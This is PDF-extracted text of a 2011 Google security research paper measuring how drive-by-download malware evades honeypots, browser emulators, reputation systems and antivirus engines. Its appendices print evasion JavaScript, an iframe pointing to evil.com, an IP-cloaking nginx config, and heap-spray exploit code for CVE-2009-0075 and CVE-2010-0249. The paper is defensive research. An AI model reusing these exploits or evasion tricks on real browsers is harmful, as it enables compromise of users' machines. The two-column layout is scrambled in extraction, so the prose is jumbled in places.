Rajab 2011a PDF
Rajab 2011a PDF
Figure 1: The diagram shows a high-level overview of Google’s 4.2 Data Collection
web-malware detection system. VMs collect data from web In order to study evasion trends we leverage two distinct data
pages and store it in a database for analysis. PageScorer lever- sets. The first set, Data Set I, is the data that is generated by our
ages multiple scorers to determine if a web page is malicious. operational pipeline, i.e., the output of PageScorer. It was gener-
ated by processing ∼ 1.6 billion distinct web pages collected be-
tween December 1, 2006 and April 1, 2011. This data is useful for
studying trends that we observe in real time. The limitation with
content; see Section 4.1.2. Next, PageScorer instructs a Browser this data is that we continuously tweak our algorithms to improve
Emulator to reprocess the content that was retrieved by the VM detection, thus any trends observed from Data Set I could be due
to identify exploits. The Browser Emulator uses the stored con- to either changes in the web pages that we are processing, or to
tent as a cache and thus does not make any network fetches; see improvements to our algorithms. To eliminate this uncertainty, we
Section 4.1.1. Finally, PageScorer uses a decision tree classifier introduce our second data set, Data Set II.
to combine the output of the VM, AV Engines, Reputation Scorer, Data Set II is created as follows. First, we select a group of
and Browser Emulator to determine whether the page attempted pages from Data Set I. We sample pages from the time period be-
to exploit the browser; see Figure 1. The output of PageScorer, tween December 1, 2006 and October 12, 2010 that were marked
including whether the page caused new processed to be spawned, as suspicious by the VM-based honeypot, the Browser Emulator,
whether it was flagged by AV engines, which exploits it contained, the AV scanners, or our Reputation data. Note that this does not
and whether it matched Domain Reputation data, is stored along mean PageScorer classified these pages as malicious. For exam-
with the original data from the VM for future analysis. ple, if an AV engine flagged a page but the other scoring com-
A description of our VM-based honeypots and AV engine inte- ponents did not, then the page would not be classified as bad by
gration has been previously published [16, 17]. Since then we have PageScorer, but it would be added to the sample. In this way the
added Browser Emulation and a Domain Reputation pipeline which sample includes every bad page that our pipeline processed over
we briefly summarize below to familiarize the reader with the data the four year period, as well as some other “suspicious” pages. In
collection process. addition to these pages, our sample also includes 1% of other “non-
suspicious” pages selected uniformly at random from the same time
4.1.1 Browser Emulation period.
Our Browser Emulator is a custom implementation similar to For each of these pages, we rescore the original HTTP responses
other mainstream emulators including PhoneyC [13] and JSAND [3]. and VM state changes that were stored in our database using a fixed
We thus believe that its performance is representative of Browser version of PageScorer from the end of October, 2010. This version
Emulators in general. consisted of algorithms and data files, including AV signature files,
Briefly, the Browser Emulator is built on top of a custom HTML from the end of the data collection period. By fixing the scorer we
parser and a modified open-source JavaScript engine. It constructs ensure that any observable trends are due to changes in the data,
a DOM and event model that is similar to Internet Explorer. To en- and are not due to the evolution of our algorithms. The output of
sure a faithful representation of IE, we have modified all parsers to this rescore comprises Data Set II.
handle IE-specific constructs; for examples, see Appendix A. The In sum, Data Set II consists of ∼160 million distinct web pages
Emulator detects exploits against both the browser and the plug-ins from ∼8 million sites. We enabled JavaScript tracing on a subset
by monitoring calls to known-vulnerable components, as well as of this data, comprising ∼75 million web pages from ∼5.5 million
monitoring DOM accesses. distinct sites.
The emulator can also perform fine-grained tracing of JavaScript In this paper the term site refers to a domain name unless the
execution. When running in tracing mode, it records every function domain corresponds to a hosting provider. In the latter case, dif-
call and the arguments to those calls, e.g. we record which DOM ferent host names are indicative of separate content owners, so we
functions were called and which arguments were passed to them. take the host name as the site. For example, http://www.cnn.
This allows for more detailed analysis of exploitation techniques, com/ and http://live.cnn.com/ both correspond to the
which we explore later in the paper. site cnn.com, whereas http://foo.blogspot.com/page1.
html and http://bar.blogspot.com/page2.html are
4.1.2 Domain Reputation mapped to foo.blogspot.com and bar.blogspot.com, re-
The domain reputation pipeline runs periodically and analyzes spectively. Throughout this paper we provide statistics at the site
the output of AV engines and the Browser Emulator to determine level, and aggregate data by month. We do this to avoid skew that
which sites are responsible for launching exploits and serving mal- could occur if our sampling algorithm selected many pages from
ware. We call these sites Distribution Domains. The pipeline em- the same site. For example, if the system encountered exploits in a
ploys a decision-tree classifier to decide whether a site is a distribu- given month on two URLs that belong to the same site, we count
tion domain. Features include, for example, whether we have seen only one exploit.
1e+06
Unique Sites
Unique Sites w/ JS Tracing 106
Unique Bad Sites Distribution
Social Engineering
800000 5
10
Unique Sites per Month
104
Number of Sites
600000
103
400000
102
200000 101
100
20
20
20
20
20
20
20
20
20
20
20
20
0
06
07
07
07
08
08
08
09
09
09
10
10
01
07
01
07
01
07
01
07
-1
-0
-0
-1
-0
-0
-1
-0
-0
-1
-0
-0
/0
/0
/0
/0
/0
/0
/0
/0
7
1/
1/
1/
1/
1/
1/
1/
1/
07
07
08
08
09
09
10
10
Figure 3: The graph shows the number of sites involved in So-
Figure 2: The graph shows the total number of sites per month cial Engineering attacks compared to all sites hosting malware
in Data Set II. The large spike in 2008 is due to the unexpected or exploits.
appearance of a benign process that caused many more pages
to be included in our analysis during that time.
Figure 4: The heat map shows the relative distribution of ex- that may not execute correctly in an emulated environment, but
ploits encountered on the web over time. Every second CVE is will work correctly in a real browser. This generally results in
labeled on the Y-axis. complex run-time behavior. To measure whether adversaries are
turning to such techniques we examined the data that was gener-
ated with JavaScript tracing enabled in Data Set II and computed
three different complexity measures:
less likely as exploitable vulnerabilities were present in all versions
of Internet Explorer and popular plugins during the course of our • Number of function calls measures the number of JavaScript
study. Regardless of the motive, social engineering poses a chal- function calls made in a trace.
lenge to VM-based honeypots must be accounted for.
• Length of strings passed to function calls measures the sum
Countermeasures. These results show that VM honeypots without of the lengths of all strings that are passed to any user-defined
user interaction may not detect web pages distributing malware via or built in JavaScript function.
social engineering. In addition to simulating user interacting with
the VM, one can also improve detecting by pursuing a signature • DOM Interaction measures the total number of DOM meth-
based approach [18]. ods called and DOM properties referenced as the JavaScript
executes.
5.2 Browser Emulation Circumvention
We hypothesize that drive-by download campaigns primarily em- We first consider the number of JavaScript function calls made
ploy two tactics to circumvent Browser Emulation: rapid incorpo- when evaluating a page. To establish a baseline we counted the
ration of zero-day exploits, and heavy obfuscation that targets dif- number of function calls made during normal page load for each
ferences between the emulator and a browser. We consider both in of the benign web pages in Data Set II. We also counted the num-
this section. ber of function calls made before delivering the first exploit for
each of the malicious pages in our Data Set II. As our analysis is
Exploit Trends. Once a vulnerability becomes public, it is quickly based on sites rather than individual web pages, we compute the
integrated into exploit kits. As a result, Browser Emulators need average value for sites on which we encounter multiple web pages
to be updated frequently to detect new vulnerabilities. To highlight in a given month. While sites with exploits are less frequent than
the changing nature of exploitation on the web, we show the rela- benign sites, our analysis finds between ∼50 and ∼150 thousand
tive prevalence of each of the 51 exploits identified by our Browser unique sites containing exploits per month with the exception of
Emulator in Data Set II in Figure 4. We see that 24 exploits are rel- the first few months in 2007 where the overall number of analyzed
atively short lived and are often replaced with newer exploits when sites is smaller.
new vulnerabilities are discovered. The main exception to this is Figures 5 and 6 show the 20%, 50% and 80% quantiles for the
the exploit of the MDAC vulnerability which is part of most exploit number of function calls for both benign and malicious web sites.
kits we encounter and represented by the dark line at the bottom of In Figure 5, we see an order of magnitude increase in the number of
the heat map. This data highlights an important opportunity for JavaScript function calls for benign sites. Figure 6 shows a change
evasion. Each time a new exploit is introduced, adversaries have a of over three orders of magnitude for the median for sites that de-
window to evade Browser Emulators until they are updated. Of the liver exploits. At the beginning of 2007, we observed about 20
51 exploits that we tracked, the median delay between public dis- JavaScript function calls, but the number of function calls jumped
closure1 and the first time the exploit appeared in Data Set II was to ∼7, 000 in 2008, and again to 70, 000 in December 2009.
20 days. However, many exploits appear in the wild even before the The number of JavaScript function calls in Figure 6 exhibits sev-
corresponding vulnerability is publicly announced. Table 1 shows eral distinct peaks and valleys. These can be explained by two phe-
the 20 CVEs that have the shortest delay between public announce- nomena. First, certain exploits require setup that employs more
ment and when the exploit appeared in Data Set II. function calls than others. The decrease in number of function
Obfuscation. To thwart a Browser Emulator, exploit kits typically calls in Autumn 2008, and again in the end of 2010 correspond
wrap the code that exercises the exploit in a form of obfuscation to the increasing prevalence of exploits against RealPlayer (CVE-
2008-1309) and a memory corruption vulnerability in IE (CVE-
1
As recorded at http://web.nvd.nist.gov/. 2010-0806). The proof-of-concept exploits that were wrapped into
20th 20th
50th 50th
100000 80th 100000 80th
10000 10000
1000 1000
Count
Count
100 100
10 10
1 1
2007-01 2007-07 2008-01 2008-07 2009-01 2009-07 2010-01 2010-07 2007-01 2007-07 2008-01 2008-07 2009-01 2009-07 2010-01 2010-07
Figure 5: The graph shows the number of JavaScript function Figure 6: The graph shows the number of JavaScript function
calls for benign web sites. Over the measurement period, we calls for web sites with exploits. We count only the function
observe an order or magnitude increase for the median. calls leading up to the first exploit. We observe an increase of
over three orders of magnitude for the median over the mea-
surement period.
20th 20th
50th 50th
100000 80th 100000 80th
10000 10000
1000 1000
Count
Count
100 100
10 10
1 1
2007-01 2007-07 2008-01 2008-07 2009-01 2009-07 2010-01 2010-07 2007-01 2007-07 2008-01 2008-07 2009-01 2009-07 2010-01 2010-07
Figure 7: The graph shows the string length complexity mea- Figure 8: The graph shows the string length complexity mea-
sure on benign pages. sure on pages with exploits.
exploit kits made few function calls, spraying the heap with simple Figures 7 and 8 for this metric on benign and malicious pages, re-
string concatenation. However, the increased count at the begin- spectively. As with the number of function calls, we see a gen-
ning of 2009 and early 2010 correspond to exploits targeting two eral upward trend. We believe these trends are influenced more by
other memory corruption bugs in IE, CVE-2009-0075, and CVE- packers than by choice of exploit. The reason for this is that heap
2010-0249. The proof-of-concept for these exploits prepared mem- sprays generally do not pass long strings to method calls; more of-
ory by allocating many DOM nodes with attacker controlled data, ten they concatenate strings or add strings to arrays. Thus, these
and thus required many function calls to launch the exploit, see trends measure changes in packers over time. Clearly, as the size
Appendix C and D for example source code. of exploit kits and the complexity of packing algorithms grow, so
The second phenomenon that explains the general upward trend does the total amount of data that must be deobfuscated.
is the appearance of new JavaScript packers that obfuscate code Another way to assess the complexity of JavaScript is to deter-
using cryptographic routines such as RSA and RC4, which make mine which DOM functions are called before reaching an exploit.
many function calls. To trigger an exploit, it is usually not neces- This measurement captures obfuscation that probes the implemen-
sary to call many functions. For example, our system encountered tation of a Browser Emulator for completeness. We instrumented
exploits for CVE-2010-0806 for the first time in March 2010. At our JavaScript engine to record the usage of 34 DOM functions and
that time, the median number of functions calls to exploit the vul- properties that are commonly used or involved in DOM manipula-
nerability was only 7, whereas the median rose to 813 in July 2010. tions, see Appendix E. We then compute the relative frequency of
Thus we attribute the rise in complexity to obfuscation meant to these calls for both benign pages, and pages that deliver exploits.
thwart emulation or manual analysis. Figures 9 and 10 show heat maps plotting the relative frequencies
Next we consider the total string length complexity measure. See of each DOM function or property. The darkness of each entry rep-
Figure 9: The heat map shows the DOM functions utilized by Figure 10: The heat map shows the DOM functions utilized by
benign web pages over time. exploit JavaScript over time.
resents the fraction of sites that utilize that specific DOM function
or property.
For benign pages, the number of DOM accesses has increased as
the web has become more interactive and feature rich. For benign
web sites, we note that the indices of the most common functions
are 3 and 13, which refer to document.body and getElementById
respectively. DOM access patterns for sites that deliver exploits are
remarkably different as significantly fewer DOM interactions are
found. Two indices, 7 and 31 stand out. They refer to createElement
and setAttribute respectively. These two functions are em-
ployed to exploit MDAC (CVE-2006-0003) [8] which has been
popular since 2006 and is part of most exploit kits. While Fig-
ure 9 shows that the clearAttributes function is not com-
monly used in benign web pages, we see a sudden increase of it in
exploits in February 2009. This coincides with the public release
of exploits targeting CVE-2009-0075; see Appendix C.
Further examination of this exploit indicates that the delivery
mechanism has been updated over time to exercise an increasing
number of DOM API functions. When the exploit was first re- Figure 11: The heat map shows the DOM functions utilized to
leased, it made use of only the three functions that are necessary exploit CVE-2009-0075. The graph shows that only two DOM
to launch the exploit: createElement, clearAttributes, functions are required to trigger the exploit, but that over time
and cloneNode2 . Over time, however, there was a steady uptick the DOM interactions have become more complex.
in the number of non-essential DOM functions that were called be-
fore delivering the payload; see Figure 11. Starting in March 2010,
about 20% of sites exploiting this vulnerability also make calls to
the relative performance of our Browser Emulator in Section 6.
appendChild and read innerHTML. In May 2010, more DOM
functions are called to stage the exploit. This change in behavior 5.3 AV Circumvention
indicates that the JavaScript to stage the exploit has become more
complex, likely to thwart analysis. AV engines commonly use signature-based detection to identify
malicious code. While it is well-known that even simple packers
Countermeasures. The trends in exploitation technique and each can successfully evade this approach, we wanted to understand the
of the complexity measures indicate that the perpetrators of drive- impact of evasion techniques at a large scale. Specifically, we mea-
by download campaigns are devoting significant effort towards evad- sured two aspects of evasion. First, we studied whether deobfuscat-
ing detection. In order to keep pace with zero-days and obfuscation ing web content would significantly improve detection rates. Sec-
techniques, Browser Emulators should be frequently updated. To ond, we studied how often AV vendors change their signatures to
facilitate such updates, it is possible to monitor the system for un- adapt to both False Positives and False Negatives.
expected errors or to compare its output to AV engines or a VM To study the impact of deobfuscation, we leveraged our Browser
infrastructure to identify potential deficiencies. One could also rely Emulator and hooked all methods that allow for dynamic injection
on these other technologies to address inherent limitations, for in- of code into the DOM, e.g., by recording assignment to innerHTML.
stance VM honeypots can be used to detect zero-days. We analyze The line labeled Deobfuscated in Figure 12 shows the percent of
additional sites in Data Set II that were flagged by AV engines only
2 after providing the engines with this injected content. This drasti-
We did not label cloneNode as a function of interest during our
analysis. cally improves performance of the AV engines, in some cases by
100 20
Added Max
Removed 90th
Deobfuscated 50th
10th
80
15
60
Percentage
Depth
10
40
5
20
0 0
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
07
07
07
08
08
08
09
09
09
10
10
07
07
07
08
08
08
09
09
09
10
10
-0
-0
-1
-0
-0
-1
-0
-0
-1
-0
-0
-0
-0
-1
-0
-0
-1
-0
-0
-1
-0
-0
3
7
Figure 12: The graph shows the monthly percentage of sites Figure 13: The graph shows malware distribution chain length
with changing virus signals between Data Set I and Data Set II. over time.
150000
150000
100000
100000
50000
50000 0
20
20
20
20
20
20
20
20
20
20
20
20
06
07
07
07
08
08
08
09
09
09
10
10
-1
-0
-0
-1
-0
-0
-1
-0
-0
-1
-0
-0
2-
4-
8-
2-
4-
8-
2-
4-
8-
2-
4-
8-
01
01
01
01
01
01
01
01
01
01
01
01
0
2007-01 2007-07 2008-01 2008-07 2009-01 2009-07 2010-01 2010-07
Figure 15: The graph shows sites with Exploit and New Process
Figure 14: The graph shows how many compromised sites in- signals.
clude content from cloaking sites in Data Set II
300000 300000
Unique sites per month
200000 200000
150000 150000
100000 100000
50000 50000
0 0
20
20 2-0
20 4-0
20 8-0
20 2-0
20 4-0
20 8-0
20 2-0
20 4-0
20 8-0
20 2-0
20 4-0
20
20 2-0
20 4-0
20 8-0
20 2-0
20 4-0
20 8-0
20 2-0
20 4-0
20 8-0
20 2-0
20 4-0
06
07
07
07
08
08
08
09
09
09
10
10
06
07
07
07
08
08
08
09
09
09
10
10
-1
-0
-0
-1
-0
-0
-1
-0
-0
-1
-0
-0
-1
-0
-0
-1
-0
-0
-1
-0
-0
-1
-0
-0
8-
8-
01
01
1
1
Figure 16: The graph shows sites with Exploit and Virus signals. Figure 17: The graph shows sites with New Process and Virus
signals.
20
20
20
20
20
20
20
20
20
20
20
06
07
07
07
08
08
08
09
09
09
10
10
clude content from a site known to distribute malware labeled Rep-
-1
-0
-0
-1
-0
-0
-1
-0
-0
-1
-0
-0
2-
4-
8-
2-
4-
8-
2-
4-
8-
2-
4-
8-
01
01
01
01
01
01
01
01
01
01
01
01
utation. From 2007 through 2008, 7.21% of sites had only a bad
reputation signal. In 2009, this number increased to 36.5%, and
in 2010 it increased to 48.5%. Note that the dramatic increase in Figure 18: The graph shows sites with bad signals vs sites that
sites only detected by cloaking corresponds to the jump in cloaking include content from a site with bad reputation.
behavior in Figure 14. At the same time the number of sites with
only BadSignals remains low, which implies that our system is able
to boot strap classification of domains that cloak with only a small AV engines. In operational settings, AV Engines also suffer signifi-
amount of data. cantly from both false positives and false negatives. Finally, we see
a rise in IP cloaking to thwart content-based detection schemes.
7. CONCLUSION Despite evasive tactics, we show that adopting a multi-pronged
approach can improve detection rates. We hope that these observa-
Researchers have proposed numerous approaches for detecting tions will be useful to the research community. Furthermore, these
the ever-increasing number of web sites spreading malware via findings highlight important design considerations for operational
drive-by downloads. Adversaries have responded with a number systems. For example, data that is served to the general public
of techniques to bypass detection. This paper studies whether eva- might trade higher false negative rates for reduced false positives.
sive practices are effective, and whether they are being pursued at On the other hand, a private institution might tolerate higher false
a large scale. positive rates to improve protection. Furthermore, a system that
Our study focuses on the four most prevalent detections tech- serves more users might become a target of circumvention and thus
niques: Virtual Machine honeypots, Browser Emulation honey- need to devote extra effort to detect cloaking.
pots, Classification based on Domain Reputation, and Anti-Virus
Engines. We measure the extent to which evasion affects each of
these schemes by analyzing four years worth of data collected by 8. REFERENCES
Google SafeBrowsing infrastructure. Our experiments corroborate [1] M. Antonakakis, R. Perdisci, D. Dagon, W. Lee, and
our hypothesis that malware authors continue to pursue delivery N. Feamster. Building a Dynamic Reputation System for
mechanisms that can confuse different malware detection systems. DNS. In Proceedings of the 19th USENIX Security
We find that Social Engineering is growing and poses challenges to Symposium (August 2010).
VM-based honeypots. JavaScript obfuscation that interacts heavily [2] F. Chang, J. Dean, S. Ghemawat, W. Hsieh, D. Wallach,
with the DOM can be used to evade both Browser Emulators and M. Burrows, T. Chandra, A. Fikes, and R. Gruber. Bigtable:
A distributed storage system for structured data. ACM honeymonkeys. In Proceedings of Network and Distributed
Transactions on Computer Systems (TOCS), 26(2):1–26, Systems Security Symposium, pages 35–49, 2006.
2008.
[3] M. Cova, C. Kruegel, and G. Vigna. Detection and analysis APPENDIX
of drive-by-download attacks and malicious JavaScript code.
In Proceedings of the 19th international conference on World A. ANALYSIS-RESISTANT JAVASCRIPT
wide web, pages 281–290. ACM, 2010. Here we provide examples of code from the wild that actively
[4] M. Felegyhazi, C. Kreibich, and V. Paxson. On the Potential try to evade browser emulators. The code has been deobfuscated
of Proactive Domain Blacklisting. In Proceedings of the 3rd for readability purposes. As discussed in Section 3, there are at
USENIX conference on Large-scale exploits and emergent least three different browser characteristics that can be tested before
threats: botnets, spyware, worms, and more, page 6. delivering a payload: JavaScript environment, parser capabilities,
USENIX Association, 2010. and the DOM.
[5] Google. V8 JavaScript Engine. JavaScript Environment. IE’s JavaScript environment is differ-
http://code.google.com/p/v8/. ent than those provided by other open source JavaScript engines.
[6] Microsoft. About Conditional Comments. For example, IE allows ; before a catch or finally clause in
http://msdn.microsoft.com/en-us/library/ JavaScript, whereas SpiderMonkey will report a parse error.
ms537512(v=vs.85).aspx. try{} ; catch(e) {} bad();
[7] Microsoft. Conditional Compilation (JavaScript). IE also supports case-insensitive access to ActiveX object proper-
http://msdn.microsoft.com/en-us/library/ ties in JavaScript.
121hztk3(v=vs.94).aspx.
var obj=new ActiveXObject(objName);
[8] Microsoft. Microsoft Security Bulletin MS06-014: obj.vAr=1; if (obj.VaR==1) bad();
Vulnerability in the Microsoft Data Access Components
(MDACS) Function Could Allow Code Execution., May Malicious web pages often identify emulators by testing that Ac-
tiveX creation returns sane values.
2006.
[9] A. Moshchuk, T. Bragin, D. Deville, S. Gribble, and H. Levy. try {new ActiveXObject("asdf")} catch(e) {bad()}
Spyproxy: Execution-based detection of malicious web
IE also supports the execScript method, which evaluates code
content. In Proceedings of 16th USENIX Security Symposium
within the global scope, whereas other engines do not.
on USENIX Security Symposium, pages 1–16. USENIX
Association, 2007. JavaScript and HTML Parsers. IE supports conditional compila-
tion in JavaScript [7], other browsers do not. Thus IE’s JavaScript
[10] A. Moshchuk, T. Bragin, S. Gribble, and H. Levy. A parser knows how to parse the following comment, and will gener-
crawler-based study of spyware in the web. In Proceedings of ate code that calls the function bad() only in the 32-bit version of
Network and Distributed Systems Security Symposium, 2006. IE.
[11] Mozilla. JavaScript:TraceMonkey. /* @cc_on
https://wiki.mozilla.org/JavaScript: @if (@_win32)
TraceMonkey. bad();
@end
[12] Mozilla. What is SpiderMonkey? @ */
http://www.mozilla.org/js/spidermonkey/.
IE also supports conditional parsing in its HTML parser. Condi-
[13] J. Nazario. PhoneyC: A virtual client honeypot. In tional comments allow IE to execute code contingent upon version
Proceedings of the 2nd USENIX conference on Large-scale numbers [6].
exploits and emergent threats: botnets, spyware, worms, and
more, page 6. USENIX Association, 2009. <!--[if IE 9]><iframe src=http://evil.com/</iframe><![endif]-->
[14] J. Oberheide, E. Cooke, and F. Jahanian. Cloudav: N-version Integration between the HTML parser and the scripting environ-
Antivirus in the Network Cloud. In Proceedings of the 17th ment may also be tested by examining the behavior of document.write.
conference on Security symposium, pages 91–106. USENIX The output of this call should be immediately handled by the parser,
Association, 2008. and any side effects should be immediately propagated to the JavaScript
environment.
[15] T. H. Project. Capture-hpc.
http://projects.honeynet.org/capture-hpc. document.write("<div id=d></div>")
if (d.tagName=="DIV") bad()
[16] N. Provos, P. Mavrommatis, M. A. Rajab, and F. Monrose.
All Your iFRAMEs Point to Us. In USENIX Security
The DOM. There are many ways in which the DOM can be probed
Symposium, pages 1–16, 2008.
for feature-completeness. The snippet from the figure below was
[17] N. Provos, D. McNamee, P. Mavrommatis, K. Wang, and found in the wild. It tests that the DOM implementation yields the
N. Modadugu. The Ghost in the Browser: Analysis of correct tree-like structure, even in the face of misnested close tags.
Web-based Malware. In Proceedings of the first USENIX It also verifies that the title variable is correctly exposed within
workshop on hot topics in Botnets (HotBots’07)., April 2007. the document object.
[18] M. A. Rajab, L. Ballard, P. Mavrommatis, N. Provos, and
X. Zhao. The Nocebo Effect on the Web: An Analysis of <html><head><title>split</title></head><body>
<b id="node" style="display:none;">999999qq
Fake Anti-Virus Distribution. In Proceedings of the 3rd <i>99999999qqf<i>rom<i>Ch<i>a</i>rC</i>o</i>
USENIX Workshop on Large-Scale Exploits and Emergent d</i>e</i>qq</i>ev</i>alqqwin<i>do</i>w</b>
Threats (LEET), April 2010. <script>
function nfc(node) {
[19] Y.-M. Wang, D. Beck, X. Jiang, R. Roussev, C. Verbowski, var r = "";
S. Chen, and S. King. Automated web patrol with strider for(var i=0; i<node.childNodes.length; i++) {
switch(node.childNodes[i].nodeType) {
case 1: r+=nfc(node.childNodes[i]); break; D. THE “AURORA” EXPLOIT
case 3: r+=node.childNodes[i].nodeValue;
}
<html><head><script>
}
var evt = null;
return r;
// SKIPPED: Generate shellcode and the spray heap.
}
var a = new Array();
for (i = 0; i < 200; i++) {
var nf = nfc(node)[document.title]("qq");
a[i] = document.createElement("COMMENT");
</script>
a[i].data = "abcd";
<script>
}
window["cccevalccc".substr(3,4)]("var nf_window="+nf[4]);
var data = "qq10qq118qq97[...]";
function ev1(evt) {
evt = document.createEventObject(evt);
var data_array = data[document.title]("qq");
document.getElementById("handle").innerHTML = "";
var jscript = "";
window.setInterval(ev2, 50);
for (var i=1; i<data_array.length; i++)
}
jscript+=String[nf[2]](data_array[i]);
nf_window[nf[3]](jscript);
function ev2() {
var data = unescape(
"%u0a0a%u0a0a%u0a0a%u0a0a"
B. IP-BASED CLOAKING "%u0a0a%u0a0a%u0a0a%u0a0a");
nginx configuration file for disallowing requests from certain IP for (i = 0; i < a.length; i++)
addresses. a[i].data = data;
evt.srcElement;
user apache; }
worker_processes 2; </script></head><body>
<span id="handle"><img src="foo.gif" onload="ev1(event)" />
http { </span></body></html>
...
#//G
deny XXX.XXX.160.0/19; Code to exploit the bug described by CVE-2010-0249. Emulat-
deny XXX.XXX.0.0/20; ing this correctly requires a proper DOM implementation and event
deny XXX.XXX.64.0/19; model.
...
server {
listen 8080;
E. DOM FUNCTIONS
location / { This appendix provides the listing of functions and properties
proxy_pass http://xxxxx.com:4480; that we labeled during JavaScript tracing. For properties, we differ-
proxy_redirect off;
proxy_ignore_client_abort on;
entiate between read and write access, e.g. reading the innerHTML
proxy_set_header X-Real-IP $remote_addr; property is different than writing to it.
proxy_set_header Host $host;
proxy_buffers 100 50k; 0 addEventListener 17 hasAttribute
proxy_read_timeout 300; 1 appendChild 18 hasChildNodes
proxy_send_timeout 300; 2 attachEvent 19 innerHTML (read)
} 3 body (read) 20 innerHTML (write)
} 4 childNodes (read) 21 insertBefore
} 5 clearAttributes 22 lastChild (read)
6 createComment 23 nextSibling (write)
7 createElement 24 outerHTML (read)
C. EXPLOIT FOR CVE-2009-0075 8 createTextNode 25 outerHTML (write)
9 detachEvent 26 parentNode (read)
var sc = unescape("..."); // shellcode 10 documentElement (read) 27 previousSibling (read)
var mem = new Array(); 11 firstChild (read) 28 removeAttribute
var ls = 0x100000 - (sc.length * 2 + 0x01020); 12 getAttribute 29 removeChild
var b = unescape("%u0c0c%u0c0c"); 13 getElementById 30 removeEventListener
while (b.length < ls / 2) b += b; 14 getElementsByClassName 31 setAttribute
15 getElementsByName 32 text (read)
var lh = b.substring(0, ls / 2); 16 getElementsByTagName 33 text (write)
delete b;
for (i = 0; i < 0xc0; i++) mem[ i ] = lh + sc;
CollectGarbage();
var badsrc = unescape(
"%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var imgs = new Array();
for (var i = 0; i < 1000; i++)
imgs.push(document.createElement("img"));
obj1 = document.createElement("tbody");
obj1.click;
var obj2 = obj1.cloneNode();
obj1.clearAttributes();
obj1 = null;
CollectGarbage();
for (var i = 0; i < imgs.length; i++)
imgs[i].src = badsrc;
obj2.click;